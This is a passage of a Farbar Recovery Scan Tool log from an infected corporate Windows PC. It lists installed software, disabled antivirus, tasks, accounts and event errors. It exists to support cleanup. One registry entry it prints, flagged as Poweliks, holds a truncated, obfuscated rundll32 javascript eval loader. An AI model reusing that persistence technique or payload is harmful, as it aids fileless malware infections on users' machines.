2014-09-24 15:27 - 2014-09-24 15:27 - 01895187 _____ () C:\Users\bashburn\Desktop\SCC Export (09-23-14).xlsx
2014-09-18 15:58 - 2014-09-18 15:58 - 00013185 _____ () C:\Users\bashburn\Downloads\Cannon Disciple 3..._[1].Think ON these Things for Lesson 3 September 21, 2014 (2)
2014-09-18 15:57 - 2014-09-18 15:57 - 00013185 _____ () C:\Users\bashburn\Downloads\Cannon Disciple 3..._[1].Think ON these Things for Lesson 3 September 21, 2014 (1)
2014-09-18 15:57 - 2014-09-18 15:57 - 00013185 _____ () C:\Users\bashburn\Downloads\Cannon Disciple 3..._[1].Think ON these Things for Lesson 3 September 21, 2014
2014-09-17 04:14 - 2014-10-06 10:16 - 00000000 ____D () C:\TEMP
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-17 10:12 - 2013-11-27 11:37 - 00000902 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-17 10:11 - 2013-11-19 12:09 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-17 10:10 - 2014-01-30 13:51 - 00000544 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-1963064-4036034935-1140883825-9640.job
2014-10-17 09:48 - 2013-11-19 10:17 - 00001072 _____ () C:\Windows\system32\config\netlogon.ftl
2014-10-17 08:11 - 2013-11-27 11:37 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-16 16:34 - 2013-12-16 16:20 - 00000000 ____D () C:\Users\bashburn\AppData\Local\CrashDumps
2014-10-16 13:33 - 2013-11-06 10:12 - 01209973 _____ () C:\Windows\WindowsUpdate.log
2014-10-16 10:18 - 2013-11-21 17:00 - 00000000 ____D () C:\Users\bashburn\AppData\Roaming\DameWare Development
2014-10-16 07:18 - 2009-07-13 22:34 - 00000215 _____ () C:\Windows\system.ini
2014-10-15 08:20 - 2009-07-14 00:45 - 00019072 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-15 08:20 - 2009-07-14 00:45 - 00019072 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-15 08:13 - 2009-07-14 01:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-14 17:01 - 2009-07-14 01:13 - 00786014 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-09 13:13 - 2013-11-27 11:38 - 00002193 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-03 10:41 - 2013-07-25 10:24 - 00000000 ____D () C:\Software
2014-10-01 14:46 - 2009-07-14 00:57 - 00001547 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-10-01 14:31 - 2013-11-19 12:12 - 00000000 ____D () C:\Users\Administrator
2014-10-01 14:31 - 2009-07-13 23:20 - 00000000 __RHD () C:\Users\Default
2014-10-01 13:20 - 2013-07-17 01:40 - 00000000 ____D () C:\Windows\Panther
2014-09-20 22:01 - 2013-11-19 16:03 - 00001604 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Focus Branch.lnk
2014-09-20 22:01 - 2013-11-19 16:03 - 00000000 ____D () C:\Focus
2014-09-18 17:04 - 2009-07-13 23:20 - 00000000 __RHD () C:\Users\Public\Libraries
2014-09-18 09:47 - 2013-11-19 12:18 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-09-17 12:08 - 2013-11-21 17:19 - 00000000 ____D () C:\Users\bashburn\AppData\Local\Deployment
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-16 00:17
 
==================== End Of Log ============================
 
 
 
 
 
 
------------------------------------------------------------------------------ Additional File ---------------------------------------------------------------------------------------------------------
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 16-10-2014
Ran by bashburn at 2014-10-17 11:01:49
Running from C:\TEMP\Combofix files
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Symantec Endpoint Protection (Disabled - Up to date) {63DF5164-9100-186D-2187-8DC619EFD8BF}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Symantec Endpoint Protection (Disabled - Up to date) {D8BEB080-B73A-17E3-1B37-B6B462689202}
FW: Symantec Endpoint Protection (Disabled) {5BE4D041-DB6F-1935-0AD8-24F3E73C9FC4}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
64 Bit HP CIO Components Installer (Version: 8.2.4 - Hewlett-Packard) Hidden
Adobe Flash Player 11 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 11.3.300.265 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.09) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated)
Altiris Application Metering Agent (x32 Version: 7.5.3219.0 - Symantec Corporation) Hidden
Altiris Deployment Agent (HKLM\...\{6C8D5E56-CA12-42B2-9075-044B4C7067A9}) (Version: 1.0.0 - Altiris)
Altiris Inventory Agent (x32 Version: 7.5.3219.0 - Symantec Corporation) Hidden
BGInfo (HKLM\...\BGInfo) (Version: 2.0 - Rollins,INC)
CA Plex 5.0 Runtimes (HKLM-x32\...\{D7116E20-F02B-4DF3-85F8-B582711E4FCC}) (Version: 1.0.1.0 - Rollins, Inc)
CCleaner (HKLM\...\CCleaner) (Version: 4.15 - Piriform)
Citrix Online Launcher (HKLM-x32\...\{AC7E7905-8C59-4806-A96D-30936A2B1FC5}) (Version: 1.0.168 - Citrix)
CVE-2012-1889 (HKLM\...\{06b2b7ed-809a-44e6-8538-ca0f5b74ecc4}.sdb) (Version:  - )
CVE-2012-1889 (HKLM\...\{29447369-6968-4e86-a208-603f6f0771a6}.sdb) (Version:  - )
CVE-2012-1889 (HKLM\...\{393ffabe-5a1a-43b3-8e03-8f573e1e0d01}.sdb) (Version:  - )
CVE-2012-1889 (HKLM\...\{7d32ab1f-1858-4373-a75a-b7cd8feb5d92}.sdb) (Version:  - )
CVE-2012-1889 (HKLM\...\{f300e352-12de-4e7f-ace3-a376874402b6}.sdb) (Version:  - )
cwbnethlp (x32 Version: 1.00.0000 - Your Company Name) Hidden
DameWare Mini Remote Control 9.0 (HKLM-x32\...\{75BBC7CB-D307-4B40-BB5C-1BEFC5B40E80}) (Version: 9.0.1.247 - SolarWinds)
DSI HR TruCheck (HKCU\...\9f1c6621dfa8d94f) (Version: 2.0.0.61 - Database Systems International)
Focus 7.2.0 (HKLM-x32\...\{6ED3132B-5BF5-4C82-9BAD-21EC7FAC5F2F}) (Version: 7.2.0 - Rollins, Inc)
Focus Ratecard fix 6.5.0 (HKLM-x32\...\{F17D3220-919E-4836-8C24-599FB587DD1F}) (Version: 1.0.0 - Rollins Inc)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.101 - Google Inc.)
Google Update Helper (x32 Version: 1.3.24.15 - Google Inc.) Hidden
GoToMeeting 6.3.0.1468 (HKCU\...\GoToMeeting) (Version: 6.3.0.1468 - CitrixOnline)
IBM i Access for Windows 7.1 (HKLM\...\{31E11496-1F84-4DCC-B07A-369B40B8B4A7}) (Version: 07.01.0001 - IBM)
IBM i Access for Windows MRI (x32 Version: 07.01.0000 - IBM) Hidden
J2SE Runtime Environment 5.0 Update 17 (HKLM-x32\...\{3248F0A8-6813-11D6-A77B-00B0D0150170}) (Version: 1.5.0.170 - Sun Microsystems, Inc.)
Java™ 6 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216031FF}) (Version: 6.0.310 - Oracle)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
McAfee Agent (HKLM-x32\...\{EBF3D65F-011E-44D2-8F4F-C74B52682EDD}) (Version: 4.8.0.1500 - McAfee, Inc.)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Office 2010 Service Pack 1 (SP1) (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{047B0968-E622-4FAA-9B4B-121FA109EDDE}) (Version:  - Microsoft)
Microsoft Office 2010 Service Pack 1 (SP1) (x32 Version:  - Microsoft) Hidden
Microsoft Office Access MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 64-bit Components 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.6029.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
MM Client (HKLM-x32\...\{6315D12F-EEB9-4F45-95A1-D543E810A925}) (Version: 9.2.603.000 - Avaya)
Patch Management Agent (Version: 7.5.3219.0 - Symantec) Hidden
Power Scheme Plug-in Setup (Version: 7.5.1597.0 - Altiris) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6543 - Realtek Semiconductor Corp.)
Rollins Common Controls (HKLM-x32\...\{E8928EB9-BCB8-4BCD-A113-9962110B370E}) (Version: 1.0.0.0 - Rollins, Inc)
Snagit 11 (HKLM-x32\...\{7CA5C4DF-8327-4035-AE2B-CA76336A04FD}) (Version: 11.0.0 - TechSmith Corporation)
Software Management Solution Plugin (Version: 7.5.3219.0 - Altiris Inc.) Hidden
SSL VPN 64 (HKLM\...\SSL VPN) (Version: 4.1 - Rollins,INC)
Symantec Endpoint Protection (HKLM\...\{C02FF081-3B1D-47BA-AA68-37D0EA4B75C5}) (Version: 12.1.3001.165 - Symantec Corporation)
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{4EEA3D3E-989C-4DF4-AB0A-3042C0C12AA3}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817396) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{39767ECA-1731-45DB-AB5B-6BF40E151D66}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2553065) (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{A8686D24-1E89-43A1-973E-05A258D2B3F8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2553181) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{48E1B6C2-7299-4F3F-AA63-42F0ACE55AA4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2553310) 32-Bit Edition (HKLM-x32\...\{90140000-006E-0409-0000-0000000FF1CE}_Office14.PROPLUS_{73E67A3A-8D61-44EF-90C2-1697C3DBE668}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2553378) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{14B7142F-D7E2-4FB0-9E3B-7CAA8D7FFC56}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2566458) (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{EFB525A0-E1C0-4E32-9968-FE401BC87363}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2596964) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{ED31DE9A-3E13-4E2C-9106-E0D8AFFB9FA6}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687503) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{B1FA5E8C-2342-45AF-8A62-5E860042F8DF}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687509) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{1CBEDB37-C438-473F-8BA0-2535B0D237E2}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687509) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{1CBEDB37-C438-473F-8BA0-2535B0D237E2}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{35698CB7-AAA2-4577-B505-DBFF504AEF23}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2767886) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{9CFD026D-EB1C-48C2-9DD2-8E8875F251B2}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837583) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{E21274CE-CA0C-49FA-93F4-DC292A052264}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2850079) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0409-0000-0000000FF1CE}_Office14.PROPLUS_{B5C70C99-B109-42FD-B219-FF12CA543F19}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2850079) 32-Bit Edition (HKLM-x32\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.PROPLUS_{82F87E28-B18E-46D6-A399-E2F19CF5949B}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2850079) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PROPLUS_{5E8EB600-8B94-429E-873E-98369C6DC1BC}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{2AB483F1-C86E-427A-83B4-23889B03512D}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.PROPLUS_{DCE104A1-1875-4469-A83D-A5BFA6C4640F}) (Version:  - Microsoft)
Update for Microsoft Outlook Social Connector 2010 (KB2553406) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{BC6DFBFD-16DD-47E1-A7EF-2C062930FA4F}) (Version:  - Microsoft)
Update for Microsoft Outlook Social Connector 2010 (KB2553406) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.PROPLUS_{1EEFF749-6F29-4F0B-AB08-4C6EA52AA110}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2775360) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{80F56E3F-1D47-4E45-B6E0-FEF4E919F4F9}) (Version:  - Microsoft)
Update for Microsoft Word 2010 (KB2837593) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{E78E2B68-8FD1-42EE-BB74-99A4D9E6222D}) (Version:  - Microsoft)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-1963064-4036034935-1140883825-9640_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Program Files (x86)\Citrix\GoToMeeting\1468\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-1963064-4036034935-1140883825-9640_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
 
==================== Restore Points  =========================
 
16-10-2014 04:00:01 Scheduled Checkpoint
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 22:34 - 2009-06-10 17:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {2DF2E46C-5560-474A-82A3-D6289F6D3309} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-11-27] (Google Inc.)
Task: {47440FA6-AED0-4068-817A-E98D9CBE3116} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2013-11-19] (Adobe Systems Incorporated)
Task: {8321DADE-FCFA-4289-8D84-C264B7DA0804} - System32\Tasks\G2MUpdateTask-S-1-5-21-1963064-4036034935-1140883825-9640 => C:\Program Files (x86)\Citrix\GoToMeeting\1468\g2mupdate.exe [2014-08-13] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {CAF0CE4A-3719-4B4C-96B6-6CE52944B1BA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-11-27] (Google Inc.)
Task: {F40B0A7E-7E7A-47B6-9B7F-33B62CE10010} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-06-24] (Piriform Ltd)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-1963064-4036034935-1140883825-9640.job => C:\Program Files (x86)\Citrix\GoToMeeting\1468\g2mupdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (whitelisted) =============
 
2013-11-19 16:12 - 2014-05-27 08:21 - 00500048 _____ () C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\AeXWiseRuleProvider.dll
2011-03-17 01:07 - 2011-03-17 01:07 - 04297568 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 16:23 - 2010-10-20 16:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2012-05-10 10:16 - 2012-05-10 10:16 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2012-10-03 04:17 - 2012-10-03 09:17 - 01765376 _____ () C:\Windows\system32\spool\DRIVERS\x64\3\LMUD1N4Z.DLL
2013-11-19 12:19 - 1999-04-29 21:05 - 01144320 _____ () C:\ZJDEWV\AW9RT.EXE
2007-04-18 19:30 - 2007-04-18 19:30 - 00393216 _____ () C:\Program Files (x86)\McAfee\Common Framework\cryptocme2.dll
2007-04-18 19:30 - 2007-04-18 19:30 - 00471040 _____ () C:\Program Files (x86)\McAfee\Common Framework\ccme_base.dll
2011-03-17 01:11 - 2011-03-17 01:11 - 04297568 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 16:45 - 2010-10-20 16:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2011-03-17 01:11 - 2011-03-17 01:11 - 04297568 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf
2010-12-21 02:15 - 2010-12-21 02:15 - 01041248 _____ () C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\UmOutlookAddin.dll
2013-11-19 12:19 - 1999-04-29 21:05 - 00421376 _____ () C:\ZJDEWV\GF9BASE.dll
2013-11-19 12:19 - 1999-04-29 21:05 - 00509440 _____ () C:\ZJDEWV\AW9BG.dll
2013-11-19 12:19 - 1999-04-29 21:05 - 00075264 _____ () C:\ZJDEWV\AW9GCC.dll
2013-11-19 12:19 - 1999-04-29 18:51 - 00047104 _____ () C:\ZJDEWV\GF9API.dll
2013-11-19 12:19 - 1999-04-29 21:05 - 00074240 _____ () C:\ZJDEWV\AW9EMU.DLL
2013-11-19 12:19 - 1999-04-29 21:05 - 00013312 _____ () C:\ZJDEWV\AW9TCP.DLL
2013-11-19 12:19 - 1999-04-29 21:05 - 00073216 _____ () C:\ZJDEWV\AW9TA.DLL
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SepMasterService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SmcService => ""="Service"
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-282504879-2390210712-2269872377-500 - Administrator - Enabled)
Guest (S-1-5-21-282504879-2390210712-2269872377-501 - Limited - Disabled)
netadmin (S-1-5-21-282504879-2390210712-2269872377-1000 - Administrator - Enabled) => C:\Users\netadmin
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/17/2014 08:11:01 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFCLOC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/16/2014 04:59:08 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 10.0.9200.16798 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: e44
 
Start Time: 01cfe93d74fbb02f
 
Termination Time: 34
 
Application Path: C:\Program Files\Internet Explorer\iexplore.exe
 
Report Id: 3ec2f959-5577-11e4-8740-fc4dd4391d8c
 
Error: (10/16/2014 04:57:53 PM) (Source: Application Hang) (EventID: 1002) (User: )
